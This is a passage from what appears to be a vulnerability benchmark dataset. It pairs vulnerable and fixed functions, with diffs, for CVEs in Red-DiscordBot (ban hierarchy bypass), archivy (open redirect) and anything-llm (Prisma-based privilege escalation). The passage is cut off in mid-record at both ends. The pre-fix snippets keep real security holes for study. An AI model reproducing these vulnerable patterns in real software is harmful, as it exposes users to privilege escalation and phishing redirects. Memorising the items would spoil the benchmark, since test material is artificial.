action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/Cog-Creators/Red-DiscordBot", "patch_url": ["https://github.com/Cog-Creators/Red-DiscordBot/commit/726bfd38adfdfaef760412a68e01447b470f438b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_62_1", "commit": "21f9a6f", "file_path": "redbot/cogs/mod/kickban.py", "start_line": 369, "end_line": 514, "snippet": " async def massban(\n self,\n ctx: commands.Context,\n user_ids: commands.Greedy[RawUserIds],\n days: Optional[int] = None,\n *,\n reason: str = None,\n ):\n \"\"\"Mass bans user(s) from the server.\n\n User IDs need to be provided in order to ban\n using this command.\"\"\"\n banned = []\n errors = {}\n upgrades = []\n\n async def show_results():\n text = _(\"Banned {num} users from the server.\").format(\n num=humanize_number(len(banned))\n )\n if errors:\n text += _(\"\\nErrors:\\n\")\n text += \"\\n\".join(errors.values())\n if upgrades:\n text += _(\n \"\\nFollowing user IDs have been upgraded from a temporary to a permanent ban:\\n\"\n )\n text += humanize_list(upgrades)\n\n for p in pagify(text):\n await ctx.send(p)\n\n def remove_processed(ids):\n return [_id for _id in ids if _id not in banned and _id not in errors]\n\n user_ids = list(set(user_ids)) # No dupes\n\n author = ctx.author\n guild = ctx.guild\n\n if not user_ids:\n await ctx.send_help()\n return\n\n if days is None:\n days = await self.config.guild(guild).default_days()\n\n if not (0 <= days <= 7):\n await ctx.send(_(\"Invalid days. Must be between 0 and 7.\"))\n return\n\n if not guild.me.guild_permissions.ban_members:\n return await ctx.send(_(\"I lack the permissions to do this.\"))\n\n tempbans = await self.config.guild(guild).current_tempbans()\n\n ban_list = await guild.bans()\n for entry in ban_list:\n for user_id in user_ids:\n if entry.user.id == user_id:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n errors[user_id] = _(\"User with ID {user_id} is already banned.\").format(\n user_id=user_id\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = guild.get_member(user_id)\n if user is not None:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n # Instead of replicating all that handling... gets attr from decorator\n try:\n success, reason = await self.ban_user(\n user=user, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n )\n if success:\n banned.append(user_id)\n else:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=reason\n )\n except Exception as e:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=e\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = discord.Object(id=user_id)\n audit_reason = get_audit_reason(author, reason)\n queue_entry = (guild.id, user_id)\n async with self.config.guild(guild).current_tempbans() as tempbans:\n if user_id in tempbans:\n tempbans.remove(user_id)\n upgrades.append(str(user_id))\n log.info(\n \"{}({}) upgraded the tempban for {} to a permaban.\".format(\n author.name, author.id, user_id\n )\n )\n banned.append(user_id)\n else:\n try:\n await guild.ban(user, reason=audit_reason, delete_message_days=days)\n log.info(\"{}({}) hackbanned {}\".format(author.name, author.id, user_id))\n except discord.NotFound:\n errors[user_id] = _(\"User with ID {user_id} not found\").format(\n user_id=user_id\n )\n continue\n except discord.Forbidden:\n errors[user_id] = _(\n \"Could not ban user with ID {user_id}: missing permissions.\"\n ).format(user_id=user_id)\n continue\n else:\n banned.append(user_id)\n\n await modlog.create_case(\n self.bot,\n guild,\n ctx.message.created_at.replace(tzinfo=timezone.utc),\n \"hackban\",\n user_id,\n author,\n reason,\n until=None,\n channel=None,\n )\n await show_results()"}], "fix_func": [{"id": "fix_py_62_1", "commit": "726bfd38adfdfaef760412a68e01447b470f438b", "file_path": "redbot/cogs/mod/kickban.py", "start_line": 369, "end_line": 527, "snippet": " async def massban(\n self,\n ctx: commands.Context,\n user_ids: commands.Greedy[RawUserIds],\n days: Optional[int] = None,\n *,\n reason: str = None,\n ):\n \"\"\"Mass bans user(s) from the server.\n\n User IDs need to be provided in order to ban\n using this command.\"\"\"\n banned = []\n errors = {}\n upgrades = []\n\n async def show_results():\n text = _(\"Banned {num} users from the server.\").format(\n num=humanize_number(len(banned))\n )\n if errors:\n text += _(\"\\nErrors:\\n\")\n text += \"\\n\".join(errors.values())\n if upgrades:\n text += _(\n \"\\nFollowing user IDs have been upgraded from a temporary to a permanent ban:\\n\"\n )\n text += humanize_list(upgrades)\n\n for p in pagify(text):\n await ctx.send(p)\n\n def remove_processed(ids):\n return [_id for _id in ids if _id not in banned and _id not in errors]\n\n user_ids = list(set(user_ids)) # No dupes\n\n author = ctx.author\n guild = ctx.guild\n\n if not user_ids:\n await ctx.send_help()\n return\n\n if days is None:\n days = await self.config.guild(guild).default_days()\n\n if not (0 <= days <= 7):\n await ctx.send(_(\"Invalid days. Must be between 0 and 7.\"))\n return\n\n if not guild.me.guild_permissions.ban_members:\n return await ctx.send(_(\"I lack the permissions to do this.\"))\n\n tempbans = await self.config.guild(guild).current_tempbans()\n\n ban_list = await guild.bans()\n for entry in ban_list:\n for user_id in user_ids:\n if entry.user.id == user_id:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n errors[user_id] = _(\"User with ID {user_id} is already banned.\").format(\n user_id=user_id\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n # We need to check here, if any of the users isn't a member and if they are,\n # we need to use our `ban_user()` method to do hierarchy checks.\n members: Dict[int, discord.Member] = {}\n to_query: List[int] = []\n\n for user_id in user_ids:\n member = guild.get_member(user_id)\n if member is not None:\n members[user_id] = member\n elif not guild.chunked:\n to_query.append(user_id)\n\n # If guild isn't chunked, we might possibly be missing the member from cache,\n # so we need to make sure that isn't the case by querying the user IDs for such guilds.\n while to_query:\n queried_members = await guild.query_members(user_ids=to_query[:100], limit=100)\n members.update((member.id, member) for member in queried_members)\n to_query = to_query[100:]\n\n # Call `ban_user()` method for all users that turned out to be guild members.\n for member in members:\n try:\n success, reason = await self.ban_user(\n user=member, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n )\n if success:\n banned.append(user_id)\n else:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=reason\n )\n except Exception as e:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=e\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = discord.Object(id=user_id)\n audit_reason = get_audit_reason(author, reason)\n queue_entry = (guild.id, user_id)\n async with self.config.guild(guild).current_tempbans() as tempbans:\n if user_id in tempbans:\n tempbans.remove(user_id)\n upgrades.append(str(user_id))\n log.info(\n \"{}({}) upgraded the tempban for {} to a permaban.\".format(\n author.name, author.id, user_id\n )\n )\n banned.append(user_id)\n else:\n try:\n await guild.ban(user, reason=audit_reason, delete_message_days=days)\n log.info(\"{}({}) hackbanned {}\".format(author.name, author.id, user_id))\n except discord.NotFound:\n errors[user_id] = _(\"User with ID {user_id} not found\").format(\n user_id=user_id\n )\n continue\n except discord.Forbidden:\n errors[user_id] = _(\n \"Could not ban user with ID {user_id}: missing permissions.\"\n ).format(user_id=user_id)\n continue\n else:\n banned.append(user_id)\n\n await modlog.create_case(\n self.bot,\n guild,\n ctx.message.created_at.replace(tzinfo=timezone.utc),\n \"hackban\",\n user_id,\n author,\n reason,\n until=None,\n channel=None,\n )\n await show_results()"}], "vul_patch": "--- a/redbot/cogs/mod/kickban.py\n+++ b/redbot/cogs/mod/kickban.py\n@@ -72,28 +72,41 @@\n await show_results()\n return\n \n+ # We need to check here, if any of the users isn't a member and if they are,\n+ # we need to use our `ban_user()` method to do hierarchy checks.\n+ members: Dict[int, discord.Member] = {}\n+ to_query: List[int] = []\n+\n for user_id in user_ids:\n- user = guild.get_member(user_id)\n- if user is not None:\n- if user_id in tempbans:\n- # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n- continue\n+ member = guild.get_member(user_id)\n+ if member is not None:\n+ members[user_id] = member\n+ elif not guild.chunked:\n+ to_query.append(user_id)\n+\n+ # If guild isn't chunked, we might possibly be missing the member from cache,\n+ # so we need to make sure that isn't the case by querying the user IDs for such guilds.\n+ while to_query:\n+ queried_members = await guild.query_members(user_ids=to_query[:100], limit=100)\n+ members.update((member.id, member) for member in queried_members)\n+ to_query = to_query[100:]\n+\n+ # Call `ban_user()` method for all users that turned out to be guild members.\n+ for member in members:\n+ try:\n+ success, reason = await self.ban_user(\n+ user=member, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n+ )\n+ if success:\n+ banned.append(user_id)\n else:\n- # Instead of replicating all that handling... gets attr from decorator\n- try:\n- success, reason = await self.ban_user(\n- user=user, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n- )\n- if success:\n- banned.append(user_id)\n- else:\n- errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n- user_id=user_id, reason=reason\n- )\n- except Exception as e:\n- errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n- user_id=user_id, reason=e\n- )\n+ errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n+ user_id=user_id, reason=reason\n+ )\n+ except Exception as e:\n+ errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n+ user_id=user_id, reason=e\n+ )\n \n user_ids = remove_processed(user_ids)\n \n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-15278:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/Red-DiscordBot\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-15278/bin/python hand_test.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-15278:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/Red-DiscordBot\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-15278/bin/python -m pytest tests/cogs/ -v -k \"not test_git_get_full_sha1_from_ambiguous_tag_and_commit and not test_git_get_full_sha1_from_ambiguous_commits\" --asyncio-mode=auto"} {"cve_id": "CVE-2022-0697", "cve_description": "Open Redirect in GitHub repository archivy/archivy prior to 1.7.0.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/archivy/archivy", "patch_url": ["https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574"], "programing_language": "Python", "vul_func": [{"id": "vul_py_319_1", "commit": "fa389e7", "file_path": "archivy/routes.py", "start_line": "41", "end_line": "271", "snippet": "@app.before_request\ndef check_perms():\n allowed_path = (\n request.path.startswith(\"/login\")\n or request.path.startswith(\"/static\")\n or request.path.startswith(\"/api/login\")\n )\n if not current_user.is_authenticated and not allowed_path:\n return redirect(url_for(\"login\", next=request.path))\n return\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n path = request.args.get(\"path\", \"\").lstrip(\"/\")\n try:\n files = data.get_items(path=path)\n except FileNotFoundError:\n flash(\"Directory does not exist.\", \"error\")\n return redirect(\"/\")\n\n return render_template(\n \"home.html\",\n title=path or \"root\",\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n dir=files,\n current_path=path,\n new_folder_form=forms.NewFolderForm(),\n delete_form=forms.DeleteFolderForm(),\n rename_form=forms.RenameDirectoryForm(),\n view_only=0,\n search_engine=app.config[\"SEARCH_CONF\"][\"engine\"],\n )\n\n\n# TODO: refactor two following methods\n@app.route(\"/bookmarks/new\", methods=[\"GET\", \"POST\"])\ndef new_bookmark():\n default_dir = app.config.get(\"DEFAULT_BOOKMARKS_DIR\", \"root directory\")\n form = forms.NewBookmarkForm(path=default_dir)\n form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n bookmark = DataObj(url=form.url.data, tags=tags, path=path, type=\"bookmark\")\n bookmark.process_bookmark_url()\n bookmark_id = bookmark.insert()\n if bookmark_id:\n flash(\"Bookmark Saved!\", \"success\")\n return redirect(f\"/dataobj/{bookmark_id}\")\n else:\n flash(bookmark.error, \"error\")\n return redirect(\"/bookmarks/new\")\n # for bookmarklet\n form.url.data = request.args.get(\"url\", \"\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"dataobjs/new.html\", title=\"New Bookmark\", form=form)\n\n\n@app.route(\"/notes/new\", methods=[\"GET\", \"POST\"])\ndef new_note():\n form = forms.NewNoteForm()\n default_dir = \"root directory\"\n form.path.choices = [(\"\", default_dir)] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n note = DataObj(title=form.title.data, path=path, tags=tags, type=\"note\")\n note_id = note.insert()\n if note_id:\n flash(\"Note Saved!\", \"success\")\n return redirect(f\"/dataobj/{note_id}\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"/dataobjs/new.html\", title=\"New Note\", form=form)\n\n\n@app.route(\"/tags\")\ndef show_all_tags():\n if not app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\" and not which(\"rg\"):\n flash(\"Ripgrep must be installed to view pages about embedded tags.\", \"error\")\n return redirect(\"/\")\n tags = sorted(get_all_tags(force=True))\n return render_template(\"tags/all.html\", title=\"All Tags\", tags=tags)\n\n\n@app.route(\"/tags/\")\ndef show_tag(tag_name):\n if not app.config[\"SEARCH_CONF\"][\"enabled\"] and not which(\"rg\"):\n flash(\n \"Search (for example ripgrep) must be installed to view pages about embedded tags.\",\n \"error\",\n )\n return redirect(\"/\")\n\n results = search(f\"#{tag_name}#\", strict=True)\n res_ids = set(\n [item[\"id\"] for item in results]\n ) # avoid duplication of results between context-aware embedded tags and metadata ones\n for res in search_frontmatter_tags(tag_name):\n if res[\"id\"] not in res_ids:\n results.append(res)\n\n return render_template(\n \"tags/show.html\",\n title=f\"Tags - {tag_name}\",\n tag_name=tag_name,\n search_result=results,\n )\n\n\n@app.route(\"/dataobj/\")\ndef show_dataobj(dataobj_id):\n dataobj = data.get_item(dataobj_id)\n get_title_id_pairs = lambda x: (x[\"title\"], x[\"id\"])\n titles = list(\n map(get_title_id_pairs, data.get_items(structured=False, load_content=False))\n )\n\n if not dataobj:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n\n if request.args.get(\"raw\") == \"1\":\n return frontmatter.dumps(dataobj)\n\n backlinks = []\n if app.config[\"SEARCH_CONF\"][\"enabled\"]:\n if app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\":\n query = f\"\\|{dataobj_id}]]\"\n else:\n query = f\"|{dataobj_id})]]\"\n backlinks = search(query, strict=True)\n\n # Form for moving data into another folder\n move_form = forms.MoveItemForm()\n move_form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n\n post_title_form = forms.TitleForm()\n post_title_form.title.data = dataobj[\"title\"]\n\n # Get all tags\n tag_list = get_all_tags()\n # and the ones present in this dataobj\n embedded_tags = set()\n PATTERN = r\"(?:^|\\n| )#(?:[-_a-zA-Z\\u00c0-\\u00d6\\u00d8-\\u00f6\\u00f8-\\u00ff0-9]+)#\"\n for match in re.finditer(PATTERN, dataobj.content):\n embedded_tags.add(match.group(0).replace(\"#\", \"\").lstrip())\n\n return render_template(\n \"dataobjs/show.html\",\n title=dataobj[\"title\"],\n dataobj=dataobj,\n backlinks=backlinks,\n current_path=dataobj[\"dir\"],\n form=forms.DeleteDataForm(),\n view_only=0,\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n post_title_form=post_title_form,\n move_form=move_form,\n tag_list=tag_list,\n embedded_tags=embedded_tags,\n titles=titles,\n )\n\n\n@app.route(\"/dataobj/move/\", methods=[\"POST\"])\ndef move_item(dataobj_id):\n form = forms.MoveItemForm()\n out_dir = form.path.data if form.path.data != \"\" else \"root directory\"\n if form.path.data == None:\n flash(\"No path specified.\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n try:\n if data.move_item(dataobj_id, form.path.data):\n flash(f\"Data successfully moved to {out_dir}.\", \"success\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n else:\n flash(f\"Data could not be moved to {out_dir}.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n except FileNotFoundError:\n flash(\"Data not found.\", \"error\")\n return redirect(\"/\")\n except FileExistsError:\n flash(\"Data already in target directory.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n\n\n@app.route(\"/dataobj/delete/\", methods=[\"POST\"])\ndef delete_data(dataobj_id):\n try:\n data.delete_item(dataobj_id)\n except BaseException:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n flash(\"Data deleted!\", \"success\")\n return redirect(\"/\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = forms.UserForm()\n if form.validate_on_submit():\n db = get_db()\n user = db.search(\n (Query().username == form.username.data) & (Query().type == \"user\")\n )\n\n if user and check_password_hash(user[0][\"hashed_password\"], form.password.data):\n user = User.from_db(user[0])\n login_user(user, remember=True)\n flash(\"Login successful!\", \"success\")\n\n next_url = request.args.get(\"next\")\n return redirect(next_url or \"/\")\n\n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n return render_template(\"users/login.html\", form=form, title=\"Login\")"}], "fix_func": [{"id": "fix_py_319_1", "commit": "2d8cb29", "file_path": "archivy/routes.py", "start_line": "41", "end_line": "274", "snippet": "@app.before_request\ndef check_perms():\n allowed_path = (\n request.path.startswith(\"/login\")\n or request.path.startswith(\"/static\")\n or request.path.startswith(\"/api/login\")\n )\n if not current_user.is_authenticated and not allowed_path:\n return redirect(url_for(\"login\", next=request.path))\n return\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n path = request.args.get(\"path\", \"\").lstrip(\"/\")\n try:\n files = data.get_items(path=path)\n except FileNotFoundError:\n flash(\"Directory does not exist.\", \"error\")\n return redirect(\"/\")\n\n return render_template(\n \"home.html\",\n title=path or \"root\",\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n dir=files,\n current_path=path,\n new_folder_form=forms.NewFolderForm(),\n delete_form=forms.DeleteFolderForm(),\n rename_form=forms.RenameDirectoryForm(),\n view_only=0,\n search_engine=app.config[\"SEARCH_CONF\"][\"engine\"],\n )\n\n\n# TODO: refactor two following methods\n@app.route(\"/bookmarks/new\", methods=[\"GET\", \"POST\"])\ndef new_bookmark():\n default_dir = app.config.get(\"DEFAULT_BOOKMARKS_DIR\", \"root directory\")\n form = forms.NewBookmarkForm(path=default_dir)\n form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n bookmark = DataObj(url=form.url.data, tags=tags, path=path, type=\"bookmark\")\n bookmark.process_bookmark_url()\n bookmark_id = bookmark.insert()\n if bookmark_id:\n flash(\"Bookmark Saved!\", \"success\")\n return redirect(f\"/dataobj/{bookmark_id}\")\n else:\n flash(bookmark.error, \"error\")\n return redirect(\"/bookmarks/new\")\n # for bookmarklet\n form.url.data = request.args.get(\"url\", \"\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"dataobjs/new.html\", title=\"New Bookmark\", form=form)\n\n\n@app.route(\"/notes/new\", methods=[\"GET\", \"POST\"])\ndef new_note():\n form = forms.NewNoteForm()\n default_dir = \"root directory\"\n form.path.choices = [(\"\", default_dir)] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n note = DataObj(title=form.title.data, path=path, tags=tags, type=\"note\")\n note_id = note.insert()\n if note_id:\n flash(\"Note Saved!\", \"success\")\n return redirect(f\"/dataobj/{note_id}\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"/dataobjs/new.html\", title=\"New Note\", form=form)\n\n\n@app.route(\"/tags\")\ndef show_all_tags():\n if not app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\" and not which(\"rg\"):\n flash(\"Ripgrep must be installed to view pages about embedded tags.\", \"error\")\n return redirect(\"/\")\n tags = sorted(get_all_tags(force=True))\n return render_template(\"tags/all.html\", title=\"All Tags\", tags=tags)\n\n\n@app.route(\"/tags/\")\ndef show_tag(tag_name):\n if not app.config[\"SEARCH_CONF\"][\"enabled\"] and not which(\"rg\"):\n flash(\n \"Search (for example ripgrep) must be installed to view pages about embedded tags.\",\n \"error\",\n )\n return redirect(\"/\")\n\n results = search(f\"#{tag_name}#\", strict=True)\n res_ids = set(\n [item[\"id\"] for item in results]\n ) # avoid duplication of results between context-aware embedded tags and metadata ones\n for res in search_frontmatter_tags(tag_name):\n if res[\"id\"] not in res_ids:\n results.append(res)\n\n return render_template(\n \"tags/show.html\",\n title=f\"Tags - {tag_name}\",\n tag_name=tag_name,\n search_result=results,\n )\n\n\n@app.route(\"/dataobj/\")\ndef show_dataobj(dataobj_id):\n dataobj = data.get_item(dataobj_id)\n get_title_id_pairs = lambda x: (x[\"title\"], x[\"id\"])\n titles = list(\n map(get_title_id_pairs, data.get_items(structured=False, load_content=False))\n )\n\n if not dataobj:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n\n if request.args.get(\"raw\") == \"1\":\n return frontmatter.dumps(dataobj)\n\n backlinks = []\n if app.config[\"SEARCH_CONF\"][\"enabled\"]:\n if app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\":\n query = f\"\\|{dataobj_id}]]\"\n else:\n query = f\"|{dataobj_id})]]\"\n backlinks = search(query, strict=True)\n\n # Form for moving data into another folder\n move_form = forms.MoveItemForm()\n move_form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n\n post_title_form = forms.TitleForm()\n post_title_form.title.data = dataobj[\"title\"]\n\n # Get all tags\n tag_list = get_all_tags()\n # and the ones present in this dataobj\n embedded_tags = set()\n PATTERN = r\"(?:^|\\n| )#(?:[-_a-zA-Z\\u00c0-\\u00d6\\u00d8-\\u00f6\\u00f8-\\u00ff0-9]+)#\"\n for match in re.finditer(PATTERN, dataobj.content):\n embedded_tags.add(match.group(0).replace(\"#\", \"\").lstrip())\n\n return render_template(\n \"dataobjs/show.html\",\n title=dataobj[\"title\"],\n dataobj=dataobj,\n backlinks=backlinks,\n current_path=dataobj[\"dir\"],\n form=forms.DeleteDataForm(),\n view_only=0,\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n post_title_form=post_title_form,\n move_form=move_form,\n tag_list=tag_list,\n embedded_tags=embedded_tags,\n titles=titles,\n )\n\n\n@app.route(\"/dataobj/move/\", methods=[\"POST\"])\ndef move_item(dataobj_id):\n form = forms.MoveItemForm()\n out_dir = form.path.data if form.path.data != \"\" else \"root directory\"\n if form.path.data == None:\n flash(\"No path specified.\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n try:\n if data.move_item(dataobj_id, form.path.data):\n flash(f\"Data successfully moved to {out_dir}.\", \"success\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n else:\n flash(f\"Data could not be moved to {out_dir}.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n except FileNotFoundError:\n flash(\"Data not found.\", \"error\")\n return redirect(\"/\")\n except FileExistsError:\n flash(\"Data already in target directory.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n\n\n@app.route(\"/dataobj/delete/\", methods=[\"POST\"])\ndef delete_data(dataobj_id):\n try:\n data.delete_item(dataobj_id)\n except BaseException:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n flash(\"Data deleted!\", \"success\")\n return redirect(\"/\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = forms.UserForm()\n if form.validate_on_submit():\n db = get_db()\n user = db.search(\n (Query().username == form.username.data) & (Query().type == \"user\")\n )\n\n if user and check_password_hash(user[0][\"hashed_password\"], form.password.data):\n user = User.from_db(user[0])\n login_user(user, remember=True)\n flash(\"Login successful!\", \"success\")\n\n next_url = request.args.get(\"next\")\n if next_url and is_safe_redirect_url(next_url):\n return redirect(next_url)\n else:\n return redirect(\"/\")\n\n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n return render_template(\"users/login.html\", form=form, title=\"Login\")"}, {"id": "fix_py_319_2", "commit": "2d8cb29", "file_path": "archivy/helpers.py", "start_line": "236", "end_line": "242", "snippet": "def is_safe_redirect_url(target):\n host_url = urlparse(request.host_url)\n redirect_url = urlparse(urljoin(request.host_url, target))\n return (\n redirect_url.scheme in (\"http\", \"https\")\n and host_url.netloc == redirect_url.netloc\n )"}], "vul_patch": "--- a/archivy/routes.py\n+++ b/archivy/routes.py\n@@ -224,7 +224,10 @@\n flash(\"Login successful!\", \"success\")\n \n next_url = request.args.get(\"next\")\n- return redirect(next_url or \"/\")\n+ if next_url and is_safe_redirect_url(next_url):\n+ return redirect(next_url)\n+ else:\n+ return redirect(\"/\")\n \n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n\n--- /dev/null\n+++ b/archivy/routes.py\n@@ -0,0 +1,7 @@\n+def is_safe_redirect_url(target):\n+ host_url = urlparse(request.host_url)\n+ redirect_url = urlparse(urljoin(request.host_url, target))\n+ return (\n+ redirect_url.scheme in (\"http\", \"https\")\n+ and host_url.netloc == redirect_url.netloc\n+ )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-3150", "cve_description": "In mintplex-labs/anything-llm, a vulnerability exists in the thread update process that allows users with Default or Manager roles to escalate their privileges to Administrator. The issue arises from improper input validation when handling HTTP POST requests to the endpoint `/workspace/:slug/thread/:threadSlug/update`. Specifically, the application fails to validate or check user input before passing it to the `workspace_thread` Prisma model for execution. This oversight allows attackers to craft a Prisma relation query operation that manipulates the `users` model to change a user's role to admin. Successful exploitation grants attackers the highest level of user privileges, enabling them to see and perform all actions within the system.", "cwe_info": {"CWE-755": {"name": "Improper Handling of Exceptional Conditions", "description": "The product does not handle or incorrectly handles an exceptional condition."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/200bd7f0615347ed2efc07903d510e5a208b0afc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_307_1", "commit": "b1a2fa6385bcbbc236454702a308f3c2e7baedb2", "file_path": "server/models/workspaceThread.js", "start_line": 25, "end_line": 44, "snippet": " update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n\n const validKeys = Object.keys(data).filter((key) =>\n this.writable.includes(key)\n );\n if (validKeys.length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n\n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n data,\n });\n return { thread, message: null };\n } catch (error) {\n console.error(error.message);\n return { thread: null, message: error.message };\n }\n },"}], "fix_func": [{"id": "fix_js_307_1", "commit": "200bd7f0615347ed2efc07903d510e5a208b0afc", "file_path": "server/models/workspaceThread.js", "start_line": 25, "end_line": 47, "snippet": " update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n\n const validData = {};\n Object.entries(data).forEach(([key, value]) => {\n if (!this.writable.includes(key)) return;\n validData[key] = value;\n });\n\n if (Object.keys(validData).length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n\n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n data: validData,\n });\n return { thread, message: null };\n } catch (error) {\n console.error(error.message);\n return { thread: null, message: error.message };\n }\n },"}], "vul_patch": "--- a/server/models/workspaceThread.js\n+++ b/server/models/workspaceThread.js\n@@ -1,16 +1,19 @@\n update: async function (prevThread = null, data = {}) {\n if (!prevThread) throw new Error(\"No thread id provided for update\");\n \n- const validKeys = Object.keys(data).filter((key) =>\n- this.writable.includes(key)\n- );\n- if (validKeys.length === 0)\n+ const validData = {};\n+ Object.entries(data).forEach(([key, value]) => {\n+ if (!this.writable.includes(key)) return;\n+ validData[key] = value;\n+ });\n+\n+ if (Object.keys(validData).length === 0)\n return { thread: prevThread, message: \"No valid fields to update!\" };\n \n try {\n const thread = await prisma.workspace_threads.update({\n where: { id: prevThread.id },\n- data,\n+ data: validData,\n });\n return { thread, message: null };\n } catch (error) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-15597", "cve_description": "A code injection exists in node-df v0.1.4 